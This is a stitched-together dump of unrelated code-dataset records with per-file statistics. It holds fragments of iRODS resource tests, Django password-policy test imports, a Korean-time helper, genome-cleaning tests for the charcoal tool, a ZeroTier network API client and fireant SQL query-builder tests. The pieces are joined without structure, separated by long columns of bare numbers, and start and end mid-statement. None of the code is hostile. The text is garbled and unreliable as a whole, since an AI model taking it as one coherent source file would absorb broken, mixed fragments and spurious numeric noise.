unix2Resc") self.admin.assert_icommand("iadmin rmchildfromresc rrResc unix1Resc") self.admin.assert_icommand("iadmin rmresc unix2Resc") self.admin.assert_icommand("iadmin rmresc unix1Resc") self.admin.assert_icommand("iadmin rmresc rrResc")
50.282828
136
0.696665
584
4,978
5.684932
0.17637
0.113855
0.153614
0.235542
0.811446
0.805723
0.779217
0.779217
0.76747
0.741566
0
0.014721
0.194857
4,978
98
137
50.795918
0.813623
0
0
0.545455
0
0
0.289103
0.018094
0
0
0
0
0.441558
0
null
null
0
0.12987
null
null
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
1
0
0
0
0
0
0
0
0
9
8c174a54b28267cfe4722770a49f3394eea6b032
54
py
Python
ex2_1.py
riderd/think-python-16
8a0cba72a5eabd933e91ae0026fec9dff8b81413
[ "Apache-2.0" ]
null
null
null
ex2_1.py
riderd/think-python-16
8a0cba72a5eabd933e91ae0026fec9dff8b81413
[ "Apache-2.0" ]
null
null
null
ex2_1.py
riderd/think-python-16
8a0cba72a5eabd933e91ae0026fec9dff8b81413
[ "Apache-2.0" ]
null
null
null
from ex2 import print_current_day print_current_day()
18
33
0.87037
9
54
4.777778
0.666667
0.55814
0.697674
0
0
0
0
0
0
0
0
0.020408
0.092593
54
3
34
18
0.857143
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
1
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
1
0
7
8c4a3eb2fe4ea8e44c82b198636bd5e03dbd19f9
182
py
Python
password_policies/tests/__init__.py
hidashun/django-password-policies
e215ba46694ea94cc072f4d04e9304a48aa54e22
[ "BSD-3-Clause" ]
null
null
null
password_policies/tests/__init__.py
hidashun/django-password-policies
e215ba46694ea94cc072f4d04e9304a48aa54e22
[ "BSD-3-Clause" ]
null
null
null
password_policies/tests/__init__.py
hidashun/django-password-policies
e215ba46694ea94cc072f4d04e9304a48aa54e22
[ "BSD-3-Clause" ]
null
null
null
from password_policies.tests.forms import * from password_policies.tests.models import * from password_policies.tests.views import * from password_policies.tests.middleware import *
36.4
48
0.846154
24
182
6.25
0.375
0.32
0.533333
0.666667
0.62
0
0
0
0
0
0
0
0.087912
182
4
49
45.5
0.903614
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
1
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
9
8c4dc8c6043647d00563a1b26f3248e035156711
465
py
Python
util/KST.py
jamakers19/SARS2-Stat-KR
a1d336eaf38821173139ef2e1cbdd71dc1dc8e49
[ "MIT" ]
34
2020-02-27T13:08:25.000Z
2020-08-14T07:46:13.000Z
util/KST.py
jamakers19/SARS2-Stat-KR
a1d336eaf38821173139ef2e1cbdd71dc1dc8e49
[ "MIT" ]
9
2020-02-28T08:03:13.000Z
2022-03-02T15:02:59.000Z
util/KST.py
jamakers19/SARS2-Stat-KR
a1d336eaf38821173139ef2e1cbdd71dc1dc8e49
[ "MIT" ]
18
2020-02-27T16:41:15.000Z
2021-06-29T15:05:09.000Z
import datetime from pytz import timezone, utc def kst_time(): kst = timezone('Asia/Seoul') now = datetime.datetime.utcnow() utc.localize(now) kst.localize(now) return utc.localize(now).astimezone(kst).strftime("%Y-%m-%d %H:%M:%S") def kst_time_for_file(): kst = timezone('Asia/Seoul') now = datetime.datetime.utcnow() utc.localize(now) kst.localize(now) return utc.localize(now).astimezone(kst).strftime("%Y-%m-%d %Hh%Mm")
29.0625
74
0.668817
68
465
4.514706
0.382353
0.214984
0.18241
0.130293
0.762215
0.762215
0.762215
0.762215
0.762215
0.762215
0
0
0.15914
465
16
75
29.0625
0.785166
0
0
0.571429
0
0
0.111588
0
0
0
0
0
0
1
0.142857
false
0
0.142857
0
0.428571
0
0
0
0
null
1
1
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
4fe3ab764eb645466acfce8241800e790be08d35
9,368
py
Python
tests/test_clean_genome.py
dib-lab/charcoal
a2b428d3829b761708910fcf97d964b937bef979
[ "BSD-3-Clause" ]
21
2020-05-08T20:51:19.000Z
2022-02-04T23:00:17.000Z
tests/test_clean_genome.py
dib-lab/charcoal
a2b428d3829b761708910fcf97d964b937bef979
[ "BSD-3-Clause" ]
162
2020-03-11T21:32:28.000Z
2022-03-09T01:02:14.000Z
tests/test_clean_genome.py
dib-lab/charcoal
a2b428d3829b761708910fcf97d964b937bef979
[ "BSD-3-Clause" ]
1
2020-03-11T21:24:13.000Z
2020-03-11T21:24:13.000Z
import sys import io import os.path from . import pytest_utils as utils from charcoal import clean_genome loomba = 'LoombaR_2017__SID1050_bax__bin.11.fa.gz' def replace_in_hit_list(src, dest, match, replace): "Adjust the hit list CSV with a quick search/replace." with open(src, 'rt') as fp: data = fp.read() data = data.replace(match, replace) assert replace in data with open(dest, 'wt') as fp2: fp2.write(data) @utils.in_tempdir def test_1_loomba(location): # regression test/check for same results on Loomba args = utils.Args() args.genome = utils.relative_file(f"demo/genomes/{loomba}") args.hit_list = utils.relative_file("tests/test-data/loomba-hit-list.csv") args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json") args.do_nothing = True clean_out = os.path.join(location, 'clean.fa.gz') dirty_out = os.path.join(location, 'dirty.fa.gz') args.clean = clean_out args.dirty = dirty_out status = clean_genome.main(args) assert status == 0 assert os.path.exists(clean_out) assert os.path.exists(dirty_out) @utils.in_tempdir def test_1_loomba_genus(location): # regression test/check for same results on Loomba args = utils.Args() args.genome = utils.relative_file(f"demo/genomes/{loomba}") args.hit_list = utils.relative_file("tests/test-data/loomba-hit-list.csv") args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json") args.do_nothing = True clean_out = os.path.join(location, 'clean.fa.gz') dirty_out = os.path.join(location, 'dirty.fa.gz') args.clean = clean_out args.dirty = dirty_out sys.stdout, old_out = io.StringIO(), sys.stdout sys.stderr, old_err = io.StringIO(), sys.stderr try: status = clean_genome.main(args) finally: sys.stdout, new_out = old_out, sys.stdout sys.stderr, new_err = old_err, sys.stderr assert status == 0 assert os.path.exists(clean_out) assert os.path.exists(dirty_out) out = new_out.getvalue() assert 'wrote 2727927 clean bp' in out assert 'wrote 12351 dirty bp' in out @utils.in_tempdir def test_1_loomba_family(location): # regression test/check for same results on Loomba args = utils.Args() args.genome = utils.relative_file(f"demo/genomes/{loomba}") # swap genus for family in the hit list -- src = utils.relative_file("tests/test-data/loomba-hit-list.csv") hit_list = os.path.join(location, 'loomba-hit-list.csv') replace_in_hit_list(src, hit_list, ',genus,,', ',family,,') args.hit_list = hit_list args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json") args.do_nothing = True clean_out = os.path.join(location, 'clean.fa.gz') dirty_out = os.path.join(location, 'dirty.fa.gz') args.clean = clean_out args.dirty = dirty_out sys.stdout, old_out = io.StringIO(), sys.stdout sys.stderr, old_err = io.StringIO(), sys.stderr try: status = clean_genome.main(args) finally: sys.stdout, new_out = old_out, sys.stdout sys.stderr, new_err = old_err, sys.stderr assert status == 0 assert os.path.exists(clean_out) assert os.path.exists(dirty_out) out = new_out.getvalue() print(out) assert 'wrote 2730931 clean bp' in out assert 'wrote 9347 dirty bp' in out @utils.in_tempdir def test_1_loomba_order(location): # regression test/check for same results on Loomba args = utils.Args() args.genome = utils.relative_file(f"demo/genomes/{loomba}") # swap genus for order in the hit list -- src = utils.relative_file("tests/test-data/loomba-hit-list.csv") hit_list = os.path.join(location, 'loomba-hit-list.csv') replace_in_hit_list(src, hit_list, ',genus,,', ',order,,') args.hit_list = hit_list args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json") args.do_nothing = True clean_out = os.path.join(location, 'clean.fa.gz') dirty_out = os.path.join(location, 'dirty.fa.gz') args.clean = clean_out args.dirty = dirty_out sys.stdout, old_out = io.StringIO(), sys.stdout sys.stderr, old_err = io.StringIO(), sys.stderr try: status = clean_genome.main(args) finally: sys.stdout, new_out = old_out, sys.stdout sys.stderr, new_err = old_err, sys.stderr assert status == 0 assert os.path.exists(clean_out) assert os.path.exists(dirty_out) out = new_out.getvalue() print(out) assert 'wrote 2732992 clean bp' in out assert 'wrote 7286 dirty bp' in out @utils.in_tempdir def test_1_loomba_class(location): # regression test/check for same results on Loomba args = utils.Args() args.genome = utils.relative_file(f"demo/genomes/{loomba}") # swap genus for class in the hit list -- src = utils.relative_file("tests/test-data/loomba-hit-list.csv") hit_list = os.path.join(location, 'loomba-hit-list.csv') replace_in_hit_list(src, hit_list, ',genus,,', ',class,,') args.hit_list = hit_list args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json") args.do_nothing = True clean_out = os.path.join(location, 'clean.fa.gz') dirty_out = os.path.join(location, 'dirty.fa.gz') args.clean = clean_out args.dirty = dirty_out sys.stdout, old_out = io.StringIO(), sys.stdout sys.stderr, old_err = io.StringIO(), sys.stderr try: status = clean_genome.main(args) finally: sys.stdout, new_out = old_out, sys.stdout sys.stderr, new_err = old_err, sys.stderr print(new_out.getvalue()) assert status == 0 assert os.path.exists(clean_out) assert os.path.exists(dirty_out) out = new_out.getvalue() assert 'wrote 2740278 clean bp' in out assert 'wrote 0 dirty bp' in out @utils.in_tempdir def test_1_loomba_none(location): # regression test/check for same results on Loomba args = utils.Args() args.genome = utils.relative_file("demo/genomes/LoombaR_2017__SID1050_bax__bin.11.fa.gz") # swap genus for none in the hit list -- src = utils.relative_file("tests/test-data/loomba-hit-list.csv") hit_list = os.path.join(location, 'loomba-hit-list.csv') replace_in_hit_list(src, hit_list, ',genus,,', ',none,,') args.hit_list = hit_list args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json") args.do_nothing = True clean_out = os.path.join(location, 'clean.fa.gz') dirty_out = os.path.join(location, 'dirty.fa.gz') args.clean = clean_out args.dirty = dirty_out sys.stdout, old_out = io.StringIO(), sys.stdout sys.stderr, old_err = io.StringIO(), sys.stderr try: status = clean_genome.main(args) finally: sys.stdout, new_out = old_out, sys.stdout sys.stderr, new_err = old_err, sys.stderr print(new_out.getvalue()) assert status == 0 assert os.path.exists(clean_out) assert os.path.exists(dirty_out) out = new_out.getvalue() assert 'wrote 2740278 clean bp' in out @utils.in_tempdir def test_1_loomba_order_override(location): # regression test/check for same results on Loomba; this uses # the override column. args = utils.Args() args.genome = utils.relative_file(f"tests/test-data/{loomba}") # override genus for order in the hit list -- src = utils.relative_file("tests/test-data/loomba-hit-list.csv") hit_list = os.path.join(location, 'loomba-hit-list.csv') replace_in_hit_list(src, hit_list, ',genus,,', ',genus,order,') args.hit_list = hit_list args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json") args.do_nothing = True clean_out = os.path.join(location, 'clean.fa.gz') dirty_out = os.path.join(location, 'dirty.fa.gz') args.clean = clean_out args.dirty = dirty_out sys.stdout, old_out = io.StringIO(), sys.stdout sys.stderr, old_err = io.StringIO(), sys.stderr try: status = clean_genome.main(args) finally: sys.stdout, new_out = old_out, sys.stdout sys.stderr, new_err = old_err, sys.stderr assert status == 0 assert os.path.exists(clean_out) assert os.path.exists(dirty_out) out = new_out.getvalue() print(out) assert 'wrote 2732992 clean bp' in out assert 'wrote 7286 dirty bp' in out @utils.in_tempdir def test_2_gca_empty(location): # regression test/check for same results on Loomba args = utils.Args() args.genome = utils.relative_file(f"demo/genomes/GCA_001593925.1_ASM159392v1_genomic.fna.gz") args.hit_list = utils.relative_file("tests/test-data/GCA_001593925_hit-list.csv") # create and use empty JSON file empty_json = os.path.join(location, 'empty.json') with open(empty_json, 'wt') as fp: fp.write('{}') args.contigs_json = empty_json args.do_nothing = False clean_out = os.path.join(location, 'clean.fa.gz') dirty_out = os.path.join(location, 'dirty.fa.gz') args.clean = clean_out args.dirty = dirty_out status = clean_genome.main(args) assert status == 0 assert os.path.exists(clean_out) assert os.path.exists(dirty_out)
32.19244
97
0.683604
1,431
9,368
4.31167
0.080363
0.054457
0.063371
0.064182
0.903566
0.900486
0.891248
0.88671
0.869368
0.848136
0
0.016385
0.192143
9,368
290
98
32.303448
0.79889
0.076003
0
0.804762
0
0
0.178169
0.10329
0
0
0
0
0.171429
1
0.042857
false
0
0.02381
0
0.066667
0.02381
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
8c90e5ad0f89db3653dd5fee8b1f8cb6c132ddf1
3,274
py
Python
usr/local/lib/python3.6/dist-packages/zerotier/network_service.py
threefoldtech/threebot_prebuilt
1f0e1c65c14cef079cd80f73927d7c8318755c48
[ "Apache-2.0" ]
11
2017-11-26T20:28:31.000Z
2021-06-08T18:26:55.000Z
usr/local/lib/python3.6/dist-packages/zerotier/network_service.py
threefoldtech/threebot_prebuilt
1f0e1c65c14cef079cd80f73927d7c8318755c48
[ "Apache-2.0" ]
2
2016-11-01T04:42:39.000Z
2016-11-01T04:46:57.000Z
usr/local/lib/python3.6/dist-packages/zerotier/network_service.py
threefoldtech/threebot_prebuilt
1f0e1c65c14cef079cd80f73927d7c8318755c48
[ "Apache-2.0" ]
2
2018-06-12T05:13:32.000Z
2021-03-17T09:21:33.000Z
class NetworkService: def __init__(self, client): self.client = client def deleteMember(self, address, id, headers=None, query_params=None, content_type="application/json"): """ Delete member from network It is method for DELETE /network/{id}/member/{address} """ uri = self.client.base_url + "/network/"+id+"/member/"+address return self.client.delete(uri, None, headers, query_params, content_type) def getMember(self, address, id, headers=None, query_params=None, content_type="application/json"): """ Get network member settings It is method for GET /network/{id}/member/{address} """ uri = self.client.base_url + "/network/"+id+"/member/"+address return self.client.get(uri, None, headers, query_params, content_type) def updateMember(self, data, address, id, headers=None, query_params=None, content_type="application/json"): """ Update member settings It is method for POST /network/{id}/member/{address} """ uri = self.client.base_url + "/network/"+id+"/member/"+address return self.client.post(uri, data, headers, query_params, content_type) def listMembers(self, id, headers=None, query_params=None, content_type="application/json"): """ Get a list of network members It is method for GET /network/{id}/member """ uri = self.client.base_url + "/network/"+id+"/member" return self.client.get(uri, None, headers, query_params, content_type) def deleteNetwork(self, id, headers=None, query_params=None, content_type="application/json"): """ Delete network It is method for DELETE /network/{id} """ uri = self.client.base_url + "/network/"+id return self.client.delete(uri, None, headers, query_params, content_type) def getNetwork(self, id, headers=None, query_params=None, content_type="application/json"): """ Get network configuration and status information It is method for GET /network/{id} """ uri = self.client.base_url + "/network/"+id return self.client.get(uri, None, headers, query_params, content_type) def updateNetwork(self, data, id, headers=None, query_params=None, content_type="application/json"): """ Update network configuration It is method for POST /network/{id} """ uri = self.client.base_url + "/network/"+id return self.client.post(uri, data, headers, query_params, content_type) def listNetworks(self, headers=None, query_params=None, content_type="application/json"): """ Get a list of networks this user owns or can view/edit It is method for GET /network """ uri = self.client.base_url + "/network" return self.client.get(uri, None, headers, query_params, content_type) def createNetwork(self, data, headers=None, query_params=None, content_type="application/json"): """ Create a new network It is method for POST /network """ uri = self.client.base_url + "/network" return self.client.post(uri, data, headers, query_params, content_type)
38.069767
112
0.640806
409
3,274
5.00978
0.146699
0.097609
0.070278
0.096633
0.849683
0.846266
0.816496
0.792094
0.726696
0.701318
0
0
0.237935
3,274
85
113
38.517647
0.821242
0.197923
0
0.566667
0
0
0.108269
0
0
0
0
0
0
1
0.333333
false
0
0
0
0.666667
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
7
8ca8dbd3078142d2adbb5e2bf5627b4cac00b26e
26,723
py
Python
fireant/tests/slicer/query_builder/test_build_dimensions.py
vladaspasic/fireant
2dbae6a97a927ef62fdcd5f37fcb51a7d6d55334
[ "Apache-2.0" ]
null
null
null
fireant/tests/slicer/query_builder/test_build_dimensions.py
vladaspasic/fireant
2dbae6a97a927ef62fdcd5f37fcb51a7d6d55334
[ "Apache-2.0" ]
null
null
null
fireant/tests/slicer/query_builder/test_build_dimensions.py
vladaspasic/fireant
2dbae6a97a927ef62fdcd5f37fcb51a7d6d55334
[ "Apache-2.0" ]
null
null
null
from unittest import TestCase from datetime import date import fireant as f from ..mocks import slicer # noinspection SqlDialectInspection,SqlNoDataSourceInspection class QueryBuilderDimensionTests(TestCase): maxDiff = None def test_build_query_with_datetime_dimension(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp"', str(queries[0])) def test_build_query_with_datetime_dimension_hourly(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp(f.hourly)) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'HH\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp"', str(queries[0])) def test_build_query_with_datetime_dimension_daily(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp(f.daily)) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp"', str(queries[0])) def test_build_query_with_datetime_dimension_weekly(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp(f.weekly)) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'IW\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp"', str(queries[0])) def test_build_query_with_datetime_dimension_monthly(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp(f.monthly)) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'MM\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp"', str(queries[0])) def test_build_query_with_datetime_dimension_quarterly(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp(f.quarterly)) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'Q\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp"', str(queries[0])) def test_build_query_with_datetime_dimension_annually(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp(f.annually)) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'Y\') "$d$timestamp",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp"', str(queries[0])) def test_build_query_with_boolean_dimension(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.winner) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' '"is_winner" "$d$winner",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$winner" ' 'ORDER BY "$d$winner"', str(queries[0])) def test_build_query_with_categorical_dimension(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.political_party) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$political_party" ' 'ORDER BY "$d$political_party"', str(queries[0])) def test_build_query_with_unique_dimension(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.election) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' '"election_id" "$d$election",' '"election_year" "$d$election_display",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$election","$d$election_display" ' 'ORDER BY "$d$election_display"', str(queries[0])) def test_build_query_with_multiple_dimensions(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp) \ .dimension(slicer.dimensions.candidate) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' '"candidate_id" "$d$candidate",' '"candidate_name" "$d$candidate_display",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp","$d$candidate","$d$candidate_display" ' 'ORDER BY "$d$timestamp","$d$candidate_display"', str(queries[0])) def test_build_query_with_multiple_dimensions_and_visualizations(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes, slicer.metrics.wins)) \ .widget(f.HighCharts() .axis(f.HighCharts.LineSeries(slicer.metrics.votes)) .axis(f.HighCharts.LineSeries(slicer.metrics.wins))) \ .dimension(slicer.dimensions.timestamp) \ .dimension(slicer.dimensions.political_party) \ .queries self.assertEqual(len(queries), 1) self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes",' 'SUM("is_winner") "$m$wins" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp","$d$political_party" ' 'ORDER BY "$d$timestamp","$d$political_party"', str(queries[0])) # noinspection SqlDialectInspection,SqlNoDataSourceInspection class QueryBuilderDimensionTotalsTests(TestCase): maxDiff = None def test_build_query_with_totals_cat_dimension(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.political_party.rollup()) \ .queries self.assertEqual(len(queries), 2) with self.subTest('base query is same as without references or totals'): self.assertEqual('SELECT ' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$political_party" ' 'ORDER BY "$d$political_party"', str(queries[0])) with self.subTest('totals dimension is replaced with NULL'): self.assertEqual('SELECT ' 'NULL "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'ORDER BY "$d$political_party"', str(queries[1])) def test_build_query_with_totals_uni_dimension(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.candidate.rollup()) \ .queries self.assertEqual(len(queries), 2) with self.subTest('base query is same as without references or totals'): self.assertEqual('SELECT ' '"candidate_id" "$d$candidate",' '"candidate_name" "$d$candidate_display",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$candidate","$d$candidate_display" ' 'ORDER BY "$d$candidate_display"', str(queries[0])) with self.subTest('totals dimension is replaced with NULL'): self.assertEqual('SELECT ' 'NULL "$d$candidate",' 'NULL "$d$candidate_display",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'ORDER BY "$d$candidate_display"', str(queries[1])) def test_build_query_with_totals_on_dimension_and_subsequent_dimensions(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp, slicer.dimensions.candidate.rollup(), slicer.dimensions.political_party) \ .queries self.assertEqual(len(queries), 2) with self.subTest('base query is same as without references or totals'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' '"candidate_id" "$d$candidate",' '"candidate_name" "$d$candidate_display",' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp","$d$candidate","$d$candidate_display","$d$political_party" ' 'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[0])) with self.subTest('all dimensions after the rolled up dimension are NULL'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'NULL "$d$candidate",' 'NULL "$d$candidate_display",' 'NULL "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[1])) def test_build_query_with_totals_on_multiple_dimensions_dimension(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp, slicer.dimensions.candidate.rollup(), slicer.dimensions.political_party.rollup()) \ .queries self.assertEqual(len(queries), 3) with self.subTest('base query is same as without references or totals'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' '"candidate_id" "$d$candidate",' '"candidate_name" "$d$candidate_display",' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp","$d$candidate","$d$candidate_display","$d$political_party" ' 'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[0])) with self.subTest('first totals dimension is replaced with null'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' '"candidate_id" "$d$candidate",' '"candidate_name" "$d$candidate_display",' 'NULL "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp","$d$candidate","$d$candidate_display" ' 'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[1])) with self.subTest('all totals dimension are replaced with null'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'NULL "$d$candidate",' 'NULL "$d$candidate_display",' 'NULL "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[2])) def test_build_query_with_totals_cat_dimension_with_references(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp, slicer.dimensions.political_party.rollup()) \ .reference(f.DayOverDay(slicer.dimensions.timestamp)) \ .queries self.assertEqual(len(queries), 4) with self.subTest('base query is same as without references or totals'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp","$d$political_party" ' 'ORDER BY "$d$timestamp","$d$political_party"', str(queries[0])) with self.subTest('reference query is shifted'): self.assertEqual('SELECT ' 'TRUNC(TIMESTAMPADD(\'day\',1,"timestamp"),\'DD\') "$d$timestamp",' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes_dod" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp","$d$political_party" ' 'ORDER BY "$d$timestamp","$d$political_party"', str(queries[1])) with self.subTest('base totals query is same as base query minus the totals dimension'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' 'NULL "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp","$d$political_party"', str(queries[2])) with self.subTest('reference total query is shifted without the totals dimension'): self.assertEqual('SELECT ' 'TRUNC(TIMESTAMPADD(\'day\',1,"timestamp"),\'DD\') "$d$timestamp",' 'NULL "$d$political_party",' 'SUM("votes") "$m$votes_dod" ' 'FROM "politics"."politician" ' 'GROUP BY "$d$timestamp" ' 'ORDER BY "$d$timestamp","$d$political_party"', str(queries[3])) def test_build_query_with_totals_cat_dimension_with_references_and_date_filters(self): queries = slicer.data \ .widget(f.DataTablesJS(slicer.metrics.votes)) \ .dimension(slicer.dimensions.timestamp) \ .dimension(slicer.dimensions.political_party.rollup()) \ .reference(f.DayOverDay(slicer.dimensions.timestamp)) \ .filter(slicer.dimensions.timestamp.between(date(2018, 1, 1), date(2019, 1, 1))) \ .queries self.assertEqual(len(queries), 4) with self.subTest('base query is same as without references or totals'): self.assertEqual('SELECT ' 'TRUNC("timestamp",\'DD\') "$d$timestamp",' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes" ' 'FROM "politics"."politician" ' 'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' ' 'GROUP BY "$d$timestamp","$d$political_party" ' 'ORDER BY "$d$timestamp","$d$political_party"', str(queries[0])) with self.subTest('reference query is shifted'): self.assertEqual('SELECT ' 'TRUNC(TIMESTAMPADD(\'day\',1,"timestamp"),\'DD\') "$d$timestamp",' '"political_party" "$d$political_party",' 'SUM("votes") "$m$votes_dod" ' 'FROM "politics"."politician" ' 'WHERE TIMESTAMPADD(\'day\',1,"timestamp") BETWEEN \'2018-01-01\' AND \'2019-01-01\' ' 'GROUP BY "$d$timestamp","$d$political_party" ' 'ORDER BY "$d$timestamp","$d$political_party"', 